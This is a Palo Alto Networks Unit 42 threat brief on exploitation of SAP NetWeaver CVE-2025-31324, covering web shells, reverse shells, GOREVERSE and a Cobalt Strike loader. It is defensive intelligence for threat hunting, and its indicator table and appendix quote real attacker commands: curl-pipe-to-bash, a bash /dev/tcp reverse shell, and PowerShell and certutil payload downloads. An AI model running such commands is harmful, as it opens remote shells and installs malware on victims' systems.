[![Logo](https://www.paloaltonetworks.com/wp-content/uploads/2021/07/PANW_Parent.png)](https://www.paloaltonetworks.com/)  
[![Unit42 Logo](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/unit42-logo-white.svg)](https://unit42.paloaltonetworks.com/)  
Menu

* [Tools](https://unit42.paloaltonetworks.com/tools/)
* [ATOMs](https://unit42.paloaltonetworks.com/atoms/)
* [Security Consulting](https://www.paloaltonetworks.com/unit42)
* [About Us](https://unit42.paloaltonetworks.com/about-unit-42/)
* [**Under Attack?**](https://start.paloaltonetworks.com/contact-unit42.html)
* [Threat Research Center](https://unit42.paloaltonetworks.com "Threat Research")
* [High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/ "High Profile Threats")
* [Vulnerabilities](https://unit42.paloaltonetworks.com/category/vulnerabilities/ "Vulnerabilities")  
  [Vulnerabilities](https://unit42.paloaltonetworks.com/category/vulnerabilities/)

# Threat Brief: CVE-2025-31324 (Updated June 25)

![Clock Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-clock.svg) 10 min read  
Related Products  
[![Advanced DNS Security icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced DNS Security](https://unit42.paloaltonetworks.com/product-category/advanced-dns-security/ "Advanced DNS Security")[![Advanced Threat Prevention icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced Threat Prevention](https://unit42.paloaltonetworks.com/product-category/advanced-threat-prevention/ "Advanced Threat Prevention")[![Advanced URL Filtering icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Advanced URL Filtering](https://unit42.paloaltonetworks.com/product-category/advanced-url-filtering/ "Advanced URL Filtering")[![Best Practice Assessment icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Best Practice Assessment](https://unit42.paloaltonetworks.com/product-category/best-practice-assessment/ "Best Practice Assessment")[![Cloud-Delivered Security Services icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Cloud-Delivered Security Services](https://unit42.paloaltonetworks.com/product-category/cloud-delivered-security-services/ "Cloud-Delivered Security Services")[![Cortex icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex](https://unit42.paloaltonetworks.com/product-category/cortex/ "Cortex")[![Cortex XDR icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XDR](https://unit42.paloaltonetworks.com/product-category/cortex-xdr/ "Cortex XDR")[![Cortex Xpanse icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex Xpanse](https://unit42.paloaltonetworks.com/product-category/cortex-xpanse/ "Cortex Xpanse")[![Cortex XSIAM icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/cortex_RGB_logo_Icon_Color.png)Cortex XSIAM](https://unit42.paloaltonetworks.com/product-category/cortex-xsiam/ "Cortex XSIAM")[![Next-Generation Firewall icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/strata_RGB_logo_Icon_Color.png)Next-Generation Firewall](https://unit42.paloaltonetworks.com/product-category/next-generation-firewall/ "Next-Generation Firewall")[![Unit 42 Incident Response icon](https://unit42.paloaltonetworks.com/wp-content/uploads/2024/06/unit42_RGB_logo_Icon_Color.png)Unit 42 Incident Response](https://unit42.paloaltonetworks.com/product-category/unit-42-incident-response/ "Unit 42 Incident Response")

* ![Profile Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-profile-grey.svg)  
  By:
  
  * [Unit 42](https://unit42.paloaltonetworks.com/author/unit42/)

* ![Published Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-calendar-grey.svg)  
  Published:May 23, 2025

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-category.svg)  
  Categories:
  
  * [High Profile Threats](https://unit42.paloaltonetworks.com/category/top-cyberthreats/)
  * [Vulnerabilities](https://unit42.paloaltonetworks.com/category/vulnerabilities/)

* ![Tags Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-tags-grey.svg)  
  Tags:
  
  * [CVE-2025-31324](https://unit42.paloaltonetworks.com/tag/cve-2025-31324/)
  * [Remote Code Execution](https://unit42.paloaltonetworks.com/tag/remote-code-execution/)
  * [Web shells](https://unit42.paloaltonetworks.com/tag/web-shells/)

* [![Download Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-download.svg)](https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/?pdf=download&lg=en&_wpnonce=af535c9c4e "Click here to download")

* [![Print Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-print.svg)](https://unit42.paloaltonetworks.com/threat-brief-sap-netweaver-cve-2025-31324/?pdf=print&lg=en&_wpnonce=af535c9c4e "Click here to print")

Share![Down arrow](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/down-arrow.svg)

* ![Link Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-share-link.svg)
* [![Link Email](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-sms.svg)](<mailto:?subject=Threat%20Brief:%20CVE-2025-31324%20(Updated%20June%2025)&body=Check%20out%20this%20article%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fthreat-brief-sap-netweaver-cve-2025-31324%2F> "Share in email")
* [![Facebook Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-fb-share.svg)](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Funit42.paloaltonetworks.com%2Fthreat-brief-sap-netweaver-cve-2025-31324%2F "Share in Facebook")
* [![LinkedIn Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-linkedin-share.svg)](<https://www.linkedin.com/sharing/share-offsite/?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fthreat-brief-sap-netweaver-cve-2025-31324%2F&title=Threat%20Brief:%20CVE-2025-31324%20(Updated%20June%2025)> "Share in LinkedIn")
* [![Twitter Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-twitter-share.svg)](<https://twitter.com/intent/tweet?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fthreat-brief-sap-netweaver-cve-2025-31324%2F&text=Threat%20Brief:%20CVE-2025-31324%20(Updated%20June%2025)> "Share in Twitter")
* [![Reddit Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-reddit-share.svg)](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https%3A%2F%2Funit42.paloaltonetworks.com%2Fthreat-brief-sap-netweaver-cve-2025-31324%2F&ts=markdown "Share in Reddit")
* [![Mastodon Icon](https://unit42.paloaltonetworks.com/wp-content/themes/unit42-v6/dist/images/icons/icon-mastodon-share.svg)](<https://mastodon.social/share?text=Threat%20Brief:%20CVE-2025-31324%20(Updated%20June%2025)%20https%3A%2F%2Funit42.paloaltonetworks.com%2Fthreat-brief-sap-netweaver-cve-2025-31324%2F> "Share in Mastodon")

## Executive Summary

Unit 42 stopped monitoring this threat and updating the brief on Monday, June 25, 2025. Please refer to the [SAP Netweaver release notes](https://help.sap.com/docs/SAP_NETWEAVER_750/825e9222e7ad4fe1988c6cc600bda779/1b1f1c6e3de24c37899e2369386febed.html) for the latest information.

**Update May 23, 2025:** We have added further details and indicators of compromise (IoC) to this post, to provide defenders additional information to hunt with. This information can be found in the [Appendix section](#SAP-tb-appendix).

On April 24, 2025, SAP disclosed [CVE-2025-31324](https://www.cve.org/CVERecord?id=CVE-2025-31324), a critical vulnerability with a CVSS score of 10.0 affecting the SAP NetWeaver's Visual Composer Framework, version 7.50. This threat brief shares a brief overview of the vulnerability and our analysis, and also includes details of what we've observed through our incident response services and telemetry.

This vulnerability allows unauthenticated users to upload arbitrary files to an SAP NetWeaver application server, leading to potential remote code execution (RCE) and full system compromise. Exploitation is achieved by sending specially crafted HTTP requests to the /developmentserver/metadatauploader endpoint. We have observed attackers leveraging this vulnerability to deploy web shells (e.g., helper.jsp and cache.jsp) for persistent access and subsequent command execution.

In our incident response cases and telemetry, we observed attackers exploiting this vulnerability to deploy, for example, reverse shell tools and a reverse SSH SOCKS proxy using a variety of network infrastructure.

We recommend that users of SAP NetWeaver refer to official [documentation and instructions from SAP](https://help.sap.com/docs/SAP_NETWEAVER_750) for guidance.

Palo Alto Networks customers receive protections from and mitigations for CVE-2025-31324 in the following ways:

* The [Next-Generation Firewall](https://docs.paloaltonetworks.com/ngfw) with the [Advanced Threat Prevention](https://docs.paloaltonetworks.com/advanced-threat-prevention/administration) security subscription can help block attacks using best practices via Threat Prevention signature [96181](https://threatvault.paloaltonetworks.com/?query=96181).
* [Cortex Xpanse](https://docs-cortex.paloaltonetworks.com/p/XPANSE) has the ability to identify internet-exposed SAP NetWeaver applications, including version information, on the public internet and escalate these findings to defenders. These findings are also available for [Cortex XSIAM](https://docs-cortex.paloaltonetworks.com/p/XSIAM) customers who have purchased the ASM module. Additionally, [a playbook is available](https://www.paloaltonetworks.com/blog/security-operations/rapid-response-to-cve-2025-31324-mitigating-sap-netweaver-visual-composer-exploitation/) as part of the Cortex XSIAM Response and Remediation pack.
* [Advanced URL Filtering](https://docs.paloaltonetworks.com/advanced-url-filtering/administration) and [Advanced DNS Security](https://docs.paloaltonetworks.com/dns-security) identify known domains and IP addresses associated with this activity as malicious.

The [Unit 42 Incident Response team](https://start.paloaltonetworks.com/contact-unit42.html) can also be engaged to help with a compromise or to provide a proactive assessment to lower your risk.

|-------------------------------|--------------------------------------------------------------------------|
| **Vulnerabilities Discussed** | [CVE-2025-31324](https://unit42.paloaltonetworks.com/tag/cve-2025-31324) |

## Details of CVE-2025-31324

CVE-2025-31324 is a critical vulnerability residing in the SAP NetWeaver Application Server Java's Visual Composer component (VCFRAMEWORK). While not installed by default, business analysts commonly use this component to create applications without coding, making it widely present in SAP deployments.

The core issue with this vulnerability is a missing authorization check in the Metadata Uploader, accessible via the /developmentserver/metadatauploader endpoint. This means that any user, even unauthenticated ones, can interact with this endpoint and upload arbitrary files to the server.

Here's a breakdown of how the vulnerability works:

**Unrestricted access** : The /developmentserver/metadatauploader endpoint is exposed over HTTP/HTTPS and lacks proper authentication or authorization controls.

**Malicious file upload**: An attacker can send a specially crafted HTTP request to the vulnerable endpoint, containing a malicious file as the request body.

**File system access** : Due to the missing authorization check, the server accepts the attacker's request and writes the uploaded file to the server's file system. The file is often written to a location within the web application's accessible directories (e.g., under /irj/servlet\_jsp/irj/root/).

**Web shell execution (common scenario)**: If the attacker uploads a web shell like a Java server page (JSP) file, the attacker can then access the web shell via a web browser. Now residing on the server, this web shell allows an attacker to execute arbitrary operating system commands with the privileges of the SAP application server process.

**System compromise** : With the ability to execute commands as an SAP system administrator (system account name: sidadm), an attacker effectively gains control of the SAP system and its associated data. The attacker can then perform various malicious activities.

CVE-2025-31324 allows attackers to bypass security controls and directly upload and execute malicious files on vulnerable SAP servers, potentially leading to complete system compromise. The ease of exploitation (no authentication required) and the possibility for high impact make this a critical vulnerability that requires immediate attention and remediation.

## Current Scope of Attacks Utilizing CVE-2025-31324

In line with [industry observations](https://onapsis.com/blog/active-exploitation-of-sap-vulnerability-cve-2025-31324/), we saw suspicious HTTP requests to the /developmentserver/metadatauploader endpoint on SAP NetWeaver systems in late January 2025 that were likely testing this vulnerability before its disclosure. Following a lull in activity, a threat actor exploited this vulnerability starting in mid-March 2025 to deploy JSP web shells, with names such as cache.jsp and help.jsp.

Unsurprisingly, following the public disclosure of this vulnerability, we saw a variety of attacks exploiting this vulnerability and attempting to send different payloads to the server.

We observed two stages of post-compromise activity:

* Reconnaissance
* Tool deployment

### Reconnaissance

Following a successful exploit and initial web shell, attackers have used a variety of common reconnaissance commands to gather information about the compromised systems and the surrounding network. Commands observed during intrusions include:

* cat /etc/hosts
* cat /etc/resolv.conf
* cat ~/.bash\_history
* cat /etc/issue
* crontab -l
* ps -ef
* df -a
* last -n 30
* netstat -tenp
* nltest /domain
* uname -a
* ls /mnt
* ls /var
* ls /opt

### Tool Deployment

The majority of initial post-exploitation activity centered around the deployment and use of web shells. While above we noted web shells named helper.jsp and cache.jsp, attackers also deployed other JSP files for web shells.

One such sample is named ran.jsp, shown in Figure 1. This is a simple JSP file capable of executing commands sent as the cmd parameter. The results of these commands are returned as HTML text, if the correct key parameter is supplied.
![Screenshot of the web shell including syntax highlighting. There are 14 lines of code in all.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/05/word-image-328632-140450-1.png) Figure 1. Content of the ran.jsp web shell.

#### GOREVERSE

We have also observed attackers deploying other reverse shell tools with the filename config. These include a publicly available tool that Google calls [GOREVERSE](https://cloud.google.com/blog/topics/threat-intelligence/initial-access-brokers-exploit-f5-screenconnect). Based on the project's [GitHub](https://github.com/NHAS/reverse_ssh) page, GOREVERSE has the following capabilities:

* Managing and connecting to reverse shells with native SSH syntax
* Dynamic, local and remote forwarding
* Native SCP and SFTP implementations for retrieving files from the targets
* Full Windows shell
* Multiple network transports, such as HTTP, web sockets and TLS
* Mutual client and server authentication to create high-trust control channels

The sample we observed was a 64-bit ELF binary that was obfuscated using another open-source tool called [Garble](https://github.com/burrowers/garble). In this instance, the threat actor first downloaded a shell script config.sh to the compromised SAP server using the initial helper.jsp webshell. The shell script was downloaded from ocr-freespace.oss-cn-beijing.aliyuncs\[.\]com and is shown below in Figure 2.
![Screenshot of the shell script from the compromised SAP server including syntax highlighting. There are multiple commands.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/05/word-image-333459-140450-2.png) Figure 2. Content of config.sh shell script.

This GOREVERSE sample uses a hard-coded C2 address and port number of 47.97.42\[.\]177:3232. The IP address 47.97.42\[.\]177 has also been associated with malware based on the open-source tool [SUPERSHELL](https://github.com/tdragon6/Supershell). Further analysis of CVE-2025-31324 exploitation activity involving this IP address (including potential attribution to a threat actor likely based in China) has been highlighted in reporting by [Forescout](https://www.forescout.com/).

#### Reverse SSH SOCKS Proxy

We observed an attacker execute the following PowerShell command to download a suspicious payload as shown in Figure 3.
![Screenshot of PowerShell code snippet that downloads a suspicious payload.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/05/word-image-337091-140450-3.png) Figure 3. PowerShell command to download suspicious payload.

The domain pages\[.\]dev is used by a legitimate Cloudflare service that can deploy websites. In this example, d-69b.pages\[.\]dev hosted a Base64-encoded PowerShell script. The decoded script performs several actions:

* Retrieves the compromised system's domain name and username, which an attacker uses to name a private key
* Kills any running ssh.exe and sshd.exe processes
* Creates temporary directories to download and store OpenSSH files from GitHub
* Generates SSH keys, and uploads the local private key to the attacker's hard-coded C2 server 45.76.93\[.\]60
* Uses ssh.exe to establish a remote tunnel to the C2 server.

## Conclusion

Based on the ease of exploiting the vulnerability and potential for high impact, we recommend taking steps to protect your organization. We recommend that users of SAP NetWeaver refer to official [documentation and instructions from SAP](https://help.sap.com/docs/SAP_NETWEAVER_750) for guidance.

Unit 42 will continue to monitor exploitation of this vulnerability and update this threat brief as appropriate.

Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the [Cyber Threat Alliance](https://www.cyberthreatalliance.org/).

## Palo Alto Networks Product Protections for CVE-2025-31324

Palo Alto Networks customers are better protected by our products, as listed below.

If you think you may have been compromised or have an urgent matter, get in touch with the [Unit 42 Incident Response team](https://start.paloaltonetworks.com/contact-unit42.html) or call:

* North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
* UK: +44.20.3743.3660
* Europe and Middle East: +31.20.299.3130
* Asia: +65.6983.8730
* Japan: +81.50.1790.0200
* Australia: +61.2.4062.7950
* India: 00080005045107

### Next-Generation Firewalls and Prisma Access With Advanced Threat Prevention

[Next-Generation Firewall](https://docs.paloaltonetworks.com/ngfw) with the [Advanced Threat Prevention](https://docs.paloaltonetworks.com/advanced-threat-prevention/administration) security subscription can help block attempted exploitation of CVE-2025-31324 via the following Threat Prevention signature: [96181](https://threatvault.paloaltonetworks.com/?query=96181).

### Cortex Xpanse

[Cortex Xpanse](https://docs-cortex.paloaltonetworks.com/p/XPANSE) has the ability to identify internet-exposed SAP NetWeaver applications, including version information, on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the "SAP NetWeaver Application Server" Attack Surface Rule is enabled.

Additionally, an Attack Surface Test named "SAP NetWeaver Visual Composer Metadata Uploader Arbitrary File Upload Vulnerability" is available, which can be run against exposed applications to provide confirmation of exploitability for this vulnerability.

These findings are also available for [Cortex XSIAM](https://docs-cortex.paloaltonetworks.com/p/XSIAM) customers who have purchased the ASM module.

### Cloud-Delivered Security Services for the Next-Generation Firewall

Domains and IP addresses associated with this malicious activity are categorized as malicious by [Advanced URL Filtering](https://docs.paloaltonetworks.com/pan-os/10-1/pan-os-new-features/url-filtering-features/advanced-url-filtering) and [Advanced DNS Security](https://docs.paloaltonetworks.com/dns-security).

### Cortex XSIAM

We have released the [CVE-2025-31324 -- SAP NetWeaver Visual Composer playbook](https://www.paloaltonetworks.com/blog/security-operations/rapid-response-to-cve-2025-31324-mitigating-sap-netweaver-visual-composer-exploitation) as part of the Cortex XSIAM Response and Remediation pack to streamline your response to this vulnerability. This playbook will automatically identify vulnerable systems, hunt for potential webshells and indicators of compromise (IOCs), execute and guide containment and remediation steps.

## Indicators of Compromise

|---------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| **Indicator** | **Data**                                                                                                                                                                                                     | **Note**                                                                                                                                                                      |
| IPv4 address  | 205.169.39\[.\]55                                                                                                                                                                                            | Tested exploit in January 2025                                                                                                                                                |
| IPv4 address  | 206.188.197\[.\]52                                                                                                                                                                                           | Exploited vulnerability and deployed web shells in March 2025                                                                                                                 |
| IPv4 address  | 65.49.235\[.\]210                                                                                                                                                                                            | Hosting suspicious payload                                                                                                                                                    |
| IPv4 address  | 108.171.195\[.\]163                                                                                                                                                                                          | Hosting suspicious payload                                                                                                                                                    |
| IPv4 address  | 47.97.42\[.\]177                                                                                                                                                                                             | GOREVERSE C2                                                                                                                                                                  |
| IPv4 address  | 45.76.93\[.\]60                                                                                                                                                                                              | Reverse SSH SOCKS proxy C2                                                                                                                                                    |
| IPv4 address  | 158.247.224\[.\]100                                                                                                                                                                                          | Hosting suspicious payload                                                                                                                                                    |
| IPv4 address  | 31.192.107\[.\]157                                                                                                                                                                                           | Hosting suspicious payload                                                                                                                                                    |
| IPv4 address  | 107.173.135\[.\]116                                                                                                                                                                                          | Attempted GET requests against several already reported web shell names                                                                                                       |
| IPv4 address  | 192.3.153\[.\]18                                                                                                                                                                                             | Attempted GET requests against several already reported web shell names to download a suspicious payload from the domain overseas-recognized-athens-oakland\[.\]trycloudflare |
| IPv4 address  | 188.166.87\[.\]88                                                                                                                                                                                            | Attempted GET requests against several already reported web shell names                                                                                                       |
| IPv4 address  | 223.184.254\[.\]150                                                                                                                                                                                          | Attempted GET requests against several already reported web shell names                                                                                                       |
| IPv4 address  | 51.79.66\[.\]183                                                                                                                                                                                             | Attempted GET requests against several already reported web shell names                                                                                                       |
| IPv4 address  | 85.106.113\[.\]168                                                                                                                                                                                           | Attempted GET requests against the helper.jsp web shell to download and execute a bash command from 138.68.61\[.\]82                                                          |
| IPv4 address  | 138.68.61\[.\]82                                                                                                                                                                                             | Reverse shell C2                                                                                                                                                              |
| IPv4 address  | 101.99.91\[.\]107                                                                                                                                                                                            | Attempted GET requests against several already reported web shell names                                                                                                       |
| IPv4 address  | 103.207.14\[.\]195                                                                                                                                                                                           | Attempted GET requests against several already reported web shell names                                                                                                       |
| IPv4 address  | 13.232.191\[.\]219                                                                                                                                                                                           | Attempted GET requests against several already reported web shell names                                                                                                       |
| FQDN          | ocr-freespace.oss-cn-beijing.aliyuncs\[.\]com                                                                                                                                                                | Hosted GOREVERSE payload                                                                                                                                                      |
| FQDN          | overseas-recognized-athens-oakland.trycloudflare\[.\]com                                                                                                                                                     | Hosted suspicious payload                                                                                                                                                     |
| FQDN          | d-69b.pages\[.\]dev                                                                                                                                                                                          | Hosting suspicious payload                                                                                                                                                    |
| Command       | curl 138.68.61\[.\]82|bash                                                                                                                                                                                  | Downloads and executes this command bash -i \>\& /dev/tcp/138.68.61\[.\]82/4544 0\>\&1                                                                                        |
| Command       | bash -i \>\& /dev/tcp/138.68.61\[.\]82/4544 0\>\&1                                                                                                                                                           | Establishes reverse shell from a compromised SAP server                                                                                                                       |
| Command       | curl -sk hxxps://overseas-recognized-athens-oakland.trycloudflare\[.\]com/v2.js || wget --no-check-certificate -q -O - hxxps://overseas-recognized-athens-oakland.trycloudflare\[.\]com/v2.js) | bash -sh | Attempted to download a suspicious payload                                                                                                                                    |
| Command       | powershell Invoke-WebRequest -Uri "hxxp://31.192.107\[.\]157:38205/ReportQueue.exe" -OutFile "C:\\programdata\\ReportQueue.exe"                                                                              | Attempting to download a suspicious payload                                                                                                                                   |
| Command       | powershell Invoke-WebRequest -Uri "hxxp://158.247.224\[.\]100:38205/EACA38DB.tmp" -OutFile "C:\\programdata\\EACA38DB.tmp"                                                                                   | Attempting to download a suspicious payload                                                                                                                                   |
| Command       | powershell curl -o "C:\\users\\public\\ansgdhs.bat" hxxp://101.32.26\[.\]154/rymhNszS/ansgdhs.bat                                                                                                            | Attempting to download a malicious Batch file                                                                                                                                 |
| Command       | powershell IEX(New-Object Net.WebClient).DownloadString('hxxps://d-69b.pages\[.\]dev/sshb64.ps1')                                                                                                            | Attempting to download a malicious PowerShell script                                                                                                                          |
| Command       | certutil.exe -urlcache -split -f hxxp://108.171.195\[.\]163:8000/$FILE\_NAME$.txt ~\\sap.com\\irj\\servlet\_jsp\\irj\\root\\Logout.jsp                                                                        | Attempting to download suspicious payload                                                                                                                                     |
| Command       | powershell (new-object Net.WebClient).DownloadFile('hxxp://108.171.195\[.\]163:8000/$FILE\_NAME$.txt ,'~\\sap.com\\irj\\servlet\_jsp\\irj\\root\\Logout.jsp')                                                 | Attempting to download suspicious payload                                                                                                                                     |
| Command       | powershell Invoke-WebRequest -Uri "hxxp://65.49.235\[.\]210/download/2.jpg" -OutFile "cmake.exe"                                                                                                             | Attempting to download unknown payload                                                                                                                                        |
| SHA256 hash   | df492597eb412c94155a7f437f593aed89cfec2f1f149eb65174c6201be69049                                                                                                                                             | Downloaded from 101.32.26\[.\]15 named shell.jsp                                                                                                                              |
| SHA256 hash   | 9fb57a4c6576a98003de6bf441e4306f72c83f783630286758f5b468abaa105d                                                                                                                                             | Downloaded by ansgdhs.bat named 0g9pglZr74.ini. This suspicious file is downloaded from 101.32.26\[.\]15.                                                                     |
| SHA256 hash   | c7b9ae61046eed01651a72afe7a31de088056f1c1430b368b1acda0b58299e28                                                                                                                                             | Downloaded by ansgdhs.bat named wbemcomn.dll this suspicious file is downloaded from 101.32.26\[.\]154 and is possibly side-loaded                                            |
| SHA256 hash   | 3f5fd4b23126cb21d1007b479954af619a16b0963a51f45cc32a8611e8e845b5                                                                                                                                             | Batch file downloaded from 101.32.26\[.\]154 named ansgdhs.bat                                                                                                                |
| SHA256 hash   | 598b38f44564565e0e76aa604f915ad88a20a8d5b5827151e681c8866b7ea8b0                                                                                                                                             | JSP webshell named helper.jsp and usage.jsp                                                                                                                                   |
| SHA256 hash   | 888e953538ff668104f838120bc4d801c41adb07027db16281402a62f6ec29ef                                                                                                                                             | GOREVERSE reverse shell, named config                                                                                                                                         |
| SHA256 hash   | 5919F2EAB8A826D7BA84E6C413626F5D11ED412D7DF0D3AB864F31D3A8DB3763                                                                                                                                             | Batch script that attempts to download GOREVERSE and executes it                                                                                                              |
| SHA256 hash   | 5a8ddc779dcf124fe5692d15be44346fb6d742322acb0eb3c6b4e90f581c5f9e                                                                                                                                             | Payload downloaded from 65.49.235\[.\]210 named 2.jpg                                                                                                                         |
| SHA256 hash   | 427877aadd89f427e1815007998d9bb88309c548951a92a6e4064df001e327c2                                                                                                                                             | Base64-encoded PowerShell Script downloaded from d-69b.pages\[.\]dev named sshb64.ps1 that creates reverse SSH SOCKS proxy                                                    |
| SHA256 hash   | 69bb809b3fee09ed3ec9138f7566cc867bd6f1e8949b5e3daff21d451c533d75                                                                                                                                             | JSP web shell named ran.jsp                                                                                                                                                   |
| SHA256 hash   | b9ef95ca541d3e05a6285411005f5fee15495251041f78e715234b09d019b92c                                                                                                                                             | Suspected web shell                                                                                                                                                           |
| SHA256 hash   | 1abf922a8228fd439a72cfddf1ed08ea09b59eaa4ae5eeba1d322d5f3e3c97e8                                                                                                                                             | Suspected web shell                                                                                                                                                           |
| SHA256 hash   | 2e6f348f8296f4e062c397d2f3708ca6fdeab2c71edfd130b2ca4c935e53c0d3                                                                                                                                             | Suspected web shell                                                                                                                                                           |
| SHA256 hash   | 6c6c984727dc53af110ed08ec8b15092facb924c8ad62e86ec76b52a00a41a40                                                                                                                                             | Suspected web shell                                                                                                                                                           |
| SHA256 hash   | 4b17beee8c2d94cf8e40efc100651d70d046f5c14a027cf97d845dc839e423f9                                                                                                                                             | Suspected web shell                                                                                                                                                           |
| SHA256 hash   | 7aab6ec707988ff3eec37f670b6bb0e0ddd02cc0093ead78eb714abded4d4a79                                                                                                                                             | Suspected web shell                                                                                                                                                           |
| SHA256 hash   | b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee                                                                                                                                             | Suspected web shell                                                                                                                                                           |

## Appendix

We further investigated the information originally posted in this threat brief, and the following section adds new indicators from separate incidents that include follow-up malware payloads.

This information can be used for threat hunting.

In the first incident, an attacker used the following PowerShell command to download malware:  
powershell Invoke-WebRequest -Uri "hxxp\[:\]//65.49.235\[.\]210/download/2.jpg" -OutFile "cmake.exe"

|-------|------------------------------------------------------------------------------------------------------|
| 1 2 3 | powershell Invoke-WebRequest -Uri "hxxp\[:\]//65.49.235\[.\]210/download/2.jpg" -OutFile "cmake.exe" |

The downloaded file is a 64-bit Windows executable with a SHA256 hash of 5a8ddc779dcf124fe5692d15be44346fb6d742322acb0eb3c6b4e90f581c5f9e.

Behavioral analysis of this file indicates it is a reverse HTTP stager. This malware calls to hxxps://65.49.235\[.\]210/\_api/web over TCP port 443 with an Authentication header and a specific User-Agent string. Figure 4 shows an example of the decrypted HTTP headers from an example of this traffic.
![A screenshot of a computer network message showing an HTTP request and the corresponding response, with text mostly in technical code format.](https://unit42.paloaltonetworks.com/wp-content/uploads/2025/05/image1.png) Figure 4. Example of decrypted traffic from the reverse HTTP stager.

At the time of our analysis, we received a 200 OK response from the C2 server, but no data was returned.

In the second incident, an attacker downloaded a batch file via the following PowerShell command:  
powershell curl -o "C:\\users\\public\\ansgdhs.bat" hxxp\[:\]//101.32.26\[.\]154/rymhNszS/ansgdhs.bat

|-------|-------------------------------------------------------------------------------------------------------|
| 1 2 3 | powershell curl -o "C:\\users\\public\\ansgdhs.bat" hxxp\[:\]//101.32.26\[.\]154/rymhNszS/ansgdhs.bat |

The SHA256 hash of the downloaded batch file ansgdhs.bat is 3f5fd4b23126cb21d1007b479954af619a16b0963a51f45cc32a8611e8e845b5.

This batch file downloads three files and saves them to a specific directory and executes the downloaded file named svchost.exe. The commands within the batch file are:  
@echo off curl -o "C:\\Users\\Public\\Pictures\\wbemcomn.dll" hxxp\[:\]//101.32.26\[.\]154/YGcFWjiI/wbemcomn.dll curl -o "C:\\Users\\Public\\Pictures\\0g9pglZr74.ini" hxxp\[:\]//101.32.26\[.\]154/VAUZuWzl/0g9pglZr74.ini curl -o "C:\\Users\\Public\\Pictures\\svhost.exe" hxxp\[:\]//101.32.26\[.\]154/ryXQSCqE/svhost.exe cd /d C:\\Users\\Public\\Pictures\&\&svhost.exe pause Endlocal

|-------------------------------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
| 1 2 3 4 5 6 7 8 9 10 11 12 13 | @echo off curl -o "C:\\Users\\Public\\Pictures\\wbemcomn.dll" hxxp\[:\]//101.32.26\[.\]154/YGcFWjiI/wbemcomn.dll curl -o "C:\\Users\\Public\\Pictures\\0g9pglZr74.ini" hxxp\[:\]//101.32.26\[.\]154/VAUZuWzl/0g9pglZr74.ini curl -o "C:\\Users\\Public\\Pictures\\svhost.exe" hxxp\[:\]//101.32.26\[.\]154/ryXQSCqE/svhost.exe cd /d C:\\Users\\Public\\Pictures\&\&svhost.exe pause Endlocal |

The three downloaded files are:

* svhost.exe
* wbemcomm.dll
* 0g9pglZr74.ini

The svhost.exe file is a legitimate system file that will sideload the wbemcomn.dll file. This DLL file is meant to decrypt a Cobalt Strike beacon a114b52c146bd11558cc7c48c3ee679ca5ca55cf2c9cc33616956a6e6229f110 from the downloaded .ini file. We extracted the following configuration from the Cobalt Strike beacon.  
